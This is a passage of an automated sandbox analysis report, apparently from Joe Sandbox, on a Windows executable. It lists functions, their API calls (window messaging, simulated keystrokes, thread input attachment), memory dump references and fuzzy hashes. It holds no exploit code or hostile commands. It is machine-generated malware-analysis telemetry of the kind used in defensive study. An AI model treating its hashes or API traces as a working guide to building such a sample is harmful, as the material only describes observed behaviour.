                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Startup
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 724789610-0
                                                                                                                                                                              • Opcode ID: e28d0036d66884aab444e9cffb5c40934ee44f94288ab37d43675e228a6fef41
                                                                                                                                                                              • Instruction ID: 54becbd4d38466ea947816c734ede00f9d71d3d4439a7d341ad1fe3ceba889c0
                                                                                                                                                                              • Opcode Fuzzy Hash: e28d0036d66884aab444e9cffb5c40934ee44f94288ab37d43675e228a6fef41
                                                                                                                                                                              • Instruction Fuzzy Hash: 64E0A0366042186BC320EA659C05AAAB7A9BB85620F04871ABDA48B2C1DA30E814C3D1
                                                                                                                                                                              Function 004B3E39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,004B34E2,?,00000001), ref: 004B3E6D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                                              • Opcode ID: ca0a9a66544a88a7fdbbe660296400b445984cdbc4772c6ae0c88e80177d1ecf
                                                                                                                                                                              • Instruction ID: c94819905b692bea3f8df4d05bf5a2f75aa9d13b5fd2fad4247fb807e240827b
                                                                                                                                                                              • Opcode Fuzzy Hash: ca0a9a66544a88a7fdbbe660296400b445984cdbc4772c6ae0c88e80177d1ecf
                                                                                                                                                                              • Instruction Fuzzy Hash: 53F03971101741CFCB349F66D490997BBF0AF1471A3258A7FE5D682621C739D948DF24
                                                                                                                                                                              Function 004F79F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 004F7A11
                                                                                                                                                                                • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FolderPath_memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3334745507-0
                                                                                                                                                                              • Opcode ID: 5105f2bc3502212fdda36dbea33c0a6347a9aa97f0fea37fa44dad3ac9000b78
                                                                                                                                                                              • Instruction ID: 5e9e4a302f31ed2085cefa9d65348106ad277978736b70aed6db2c007a41a253
                                                                                                                                                                              • Opcode Fuzzy Hash: 5105f2bc3502212fdda36dbea33c0a6347a9aa97f0fea37fa44dad3ac9000b78
                                                                                                                                                                              • Instruction Fuzzy Hash: 44D05EA65002282FDB50E634AC09EFB36ADCB44108F0002A1786DD2142E964AE4586F0
                                                                                                                                                                              Function 004B193B Relevance: 1.5, APIs: 1, Instructions: 18windowtimeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 004B1952
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSendTimeout
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1599653421-0
                                                                                                                                                                              • Opcode ID: b860a5062cef4311f5771447404a5ee1615ac7a88385b503b5ee055f52aa8e42
                                                                                                                                                                              • Instruction ID: 14160cee5df86f708d3ba14dbf0af85c41abc4acba6db0e8b4c2ad6e5b0925a3
                                                                                                                                                                              • Opcode Fuzzy Hash: b860a5062cef4311f5771447404a5ee1615ac7a88385b503b5ee055f52aa8e42
                                                                                                                                                                              • Instruction Fuzzy Hash: 16D0C9B16902087EFB008761DD07DBB776CD721A81F0046617A16D6491D6649E099570
                                                                                                                                                                              Function 004EE390 Relevance: 1.5, APIs: 1, Instructions: 16windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 004B1952
                                                                                                                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 004EE3AA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1777923405-0
                                                                                                                                                                              • Opcode ID: 1d8f76d8e729c45bc32ff080586a7f2248ad5009abacfdd2d6898779f143c0d6
                                                                                                                                                                              • Instruction ID: 940d5801d70d27e2a8f11d304fb1c65777633d1fba112f0b7acb43485e9f5594
                                                                                                                                                                              • Opcode Fuzzy Hash: 1d8f76d8e729c45bc32ff080586a7f2248ad5009abacfdd2d6898779f143c0d6
                                                                                                                                                                              • Instruction Fuzzy Hash: 79D01231144150EAFA706B16FC06FC177A29B40751F11045AB580672F5C7D25C41A554
                                                                                                                                                                              Function 00506FC3 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: TextWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 530164218-0
                                                                                                                                                                              • Opcode ID: a7d7b806947b69aa95e1374b1869ac50361998fdb8d76968b622eb1971e145f7
                                                                                                                                                                              • Instruction ID: 71e13e098915a86af9ab9055fdf1cf5877ddf49df880ca4f76a63faed39a93d3
                                                                                                                                                                              • Opcode Fuzzy Hash: a7d7b806947b69aa95e1374b1869ac50361998fdb8d76968b622eb1971e145f7
                                                                                                                                                                              • Instruction Fuzzy Hash: 57D067362145149F8701AB99E845C8577E9EB5D7103018056F5099B231D621E855AB94
                                                                                                                                                                              Function 004B4FB3 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,005249DA,?,?,00000000), ref: 004B4FC4
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                                              • Opcode ID: bec939b21a5d98b27c0813d874d20765af24a6a89b490b68bcaf7d883bb3b9d5
                                                                                                                                                                              • Instruction ID: eb53db11733a18f401090b932585ae758fe896f2cff53de1aa5a7ba859284a1d
                                                                                                                                                                              • Opcode Fuzzy Hash: bec939b21a5d98b27c0813d874d20765af24a6a89b490b68bcaf7d883bb3b9d5
                                                                                                                                                                              • Instruction Fuzzy Hash: 25D0C97464020CBFEB00CB90DC46F9A7BBCEB04718F200194F600A62D0D2F2BE449B65
                                                                                                                                                                              Function 00524DDC Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClearVariant
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1473721057-0
                                                                                                                                                                              • Opcode ID: 4da1c9bbbae095c71dba0e0478ff6cece7da9e81a29b743835c287b4c19cfef1
                                                                                                                                                                              • Instruction ID: bb733a2f22e8e8a66c115a74cc87a3e1d19c56dbd4c97f4c10742c5c96eb8f8a
                                                                                                                                                                              • Opcode Fuzzy Hash: 4da1c9bbbae095c71dba0e0478ff6cece7da9e81a29b743835c287b4c19cfef1
                                                                                                                                                                              • Instruction Fuzzy Hash: A4D0C775500100DBD7605F65E514B5AB7F47F90304F24441FE5C582250D77A98D6DB19
                                                                                                                                                                              Function 004D4129 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __wfsopen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 197181222-0
                                                                                                                                                                              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                                                              • Instruction ID: d737acbc70da5eadef2b7d2cb617a21c535a8ef2b4ee69cd1fc28c820be5115a
                                                                                                                                                                              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                                                              • Instruction Fuzzy Hash: 90B0927244030C77CE012A82EC06A493B19AB90764F008022FB0C18261A677AAA09A89
                                                                                                                                                                              Function 004B50EC Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,004B50BE,?,004B5088,?,004BBE3D,005722E8,?,00000000,?,004B3E2E,?,00000000,?), ref: 004B510C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2962429428-0
                                                                                                                                                                              • Opcode ID: cb528b4426cb51269920cc6f175aead43efe424b7cbe691bf0e2431cb1f9df7a
                                                                                                                                                                              • Instruction ID: 654e01873fa11cc6942bd7cdeada659ce248a5c95652dd71d93509fbc2372386
                                                                                                                                                                              • Opcode Fuzzy Hash: cb528b4426cb51269920cc6f175aead43efe424b7cbe691bf0e2431cb1f9df7a
                                                                                                                                                                              • Instruction Fuzzy Hash: 80E0B675800B12CBC2315F1AE804553FBF9FFE13613218A2FD0E582660D7B4548ADBA4

                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                              Function 0051F5D0 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                                                                                                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0051F64E
                                                                                                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0051F6AD
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0051F6EA
                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0051F711
                                                                                                                                                                              • SendMessageW.USER32 ref: 0051F737
                                                                                                                                                                              • _wcsncpy.LIBCMT ref: 0051F7A3
                                                                                                                                                                              • GetKeyState.USER32(00000011), ref: 0051F7C4
                                                                                                                                                                              • GetKeyState.USER32(00000009), ref: 0051F7D1
                                                                                                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0051F7E7
                                                                                                                                                                              • GetKeyState.USER32(00000010), ref: 0051F7F1
                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0051F820
                                                                                                                                                                              • SendMessageW.USER32 ref: 0051F843
                                                                                                                                                                              • SendMessageW.USER32(?,00001030,?,0051DE69), ref: 0051F940
                                                                                                                                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0051F956
                                                                                                                                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0051F967
                                                                                                                                                                              • SetCapture.USER32(?), ref: 0051F970
                                                                                                                                                                              • ClientToScreen.USER32(?,?), ref: 0051F9D4
                                                                                                                                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0051F9E0
                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0051F9FA
                                                                                                                                                                              • ReleaseCapture.USER32 ref: 0051FA05
                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 0051FA3A
                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 0051FA47
                                                                                                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0051FAA9
                                                                                                                                                                              • SendMessageW.USER32 ref: 0051FAD3
                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0051FB12
                                                                                                                                                                              • SendMessageW.USER32 ref: 0051FB3D
                                                                                                                                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0051FB55
                                                                                                                                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0051FB60
                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 0051FB81
                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 0051FB8E
                                                                                                                                                                              • GetParent.USER32(?), ref: 0051FBAA
                                                                                                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0051FC10
                                                                                                                                                                              • SendMessageW.USER32 ref: 0051FC40
                                                                                                                                                                              • ClientToScreen.USER32(?,?), ref: 0051FC96
                                                                                                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0051FCC2
                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0051FCEA
                                                                                                                                                                              • SendMessageW.USER32 ref: 0051FD0D
                                                                                                                                                                              • ClientToScreen.USER32(?,?), ref: 0051FD57
                                                                                                                                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0051FD87
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0051FE1C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                                                                              • String ID: @GUI_DRAGID$F
                                                                                                                                                                              • API String ID: 2516578528-4164748364
                                                                                                                                                                              • Opcode ID: d1c19cf62dfc9fde597fa84809f4061e89843fd3ccb1181857be4b2bde106426
                                                                                                                                                                              • Instruction ID: 81b9797078338b633a23fbbfba418ff6e6dfd74eed8dfa0b78f905f76eda2303
                                                                                                                                                                              • Opcode Fuzzy Hash: d1c19cf62dfc9fde597fa84809f4061e89843fd3ccb1181857be4b2bde106426
                                                                                                                                                                              • Instruction Fuzzy Hash: 44328C71204201AFE710DF68D884AAABFF9FF48358F140A29F6A6872B1D731DC95DB51
                                                                                                                                                                              Function 0051A8DC Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0051AFDB
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID: %d/%02d/%02d
                                                                                                                                                                              • API String ID: 3850602802-328681919
                                                                                                                                                                              • Opcode ID: e0ec9c54a355e344aa21cf73d7b9003ebb8d7b04b48f591d4080e97b6cf6aaa6
                                                                                                                                                                              • Instruction ID: 060c2d181d76e01ecceae61ec3f5d21db80eebe5b011bc33a9dbe3dd1c528915
                                                                                                                                                                              • Opcode Fuzzy Hash: e0ec9c54a355e344aa21cf73d7b9003ebb8d7b04b48f591d4080e97b6cf6aaa6
                                                                                                                                                                              • Instruction Fuzzy Hash: 8012DEB1601204ABEB268F65DC49FEE7FB8FF45310F10421AF51ADB291DB748985DB22
                                                                                                                                                                              Function 004CF78E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetForegroundWindow.USER32(00000000,00000000), ref: 004CF796
                                                                                                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00524388
                                                                                                                                                                              • IsIconic.USER32(000000FF), ref: 00524391
                                                                                                                                                                              • ShowWindow.USER32(000000FF,00000009), ref: 0052439E
                                                                                                                                                                              • SetForegroundWindow.USER32(000000FF), ref: 005243A8
                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 005243BE
                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 005243C5
                                                                                                                                                                              • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 005243D1
                                                                                                                                                                              • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 005243E2
                                                                                                                                                                              • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 005243EA
                                                                                                                                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 005243F2
                                                                                                                                                                              • SetForegroundWindow.USER32(000000FF), ref: 005243F5
                                                                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0052440A
                                                                                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00524415
                                                                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0052441F
                                                                                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00524424
                                                                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0052442D
                                                                                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00524432
                                                                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0052443C
                                                                                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00524441
                                                                                                                                                                              • SetForegroundWindow.USER32(000000FF), ref: 00524444
                                                                                                                                                                              • AttachThreadInput.USER32(000000FF,?,00000000), ref: 0052446B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                              • String ID: Shell_TrayWnd
                                                                                                                                                                              • API String ID: 4125248594-2988720461
                                                                                                                                                                              • Opcode ID: 9ed413487e357585987da2afdb63d64177fdfee9bae8c8b31c11ecddba374191
                                                                                                                                                                              • Instruction ID: 90a3bc080149fcfa8d2f5bf21ca07965a32df0141aefbfb2cd5f837378a24301
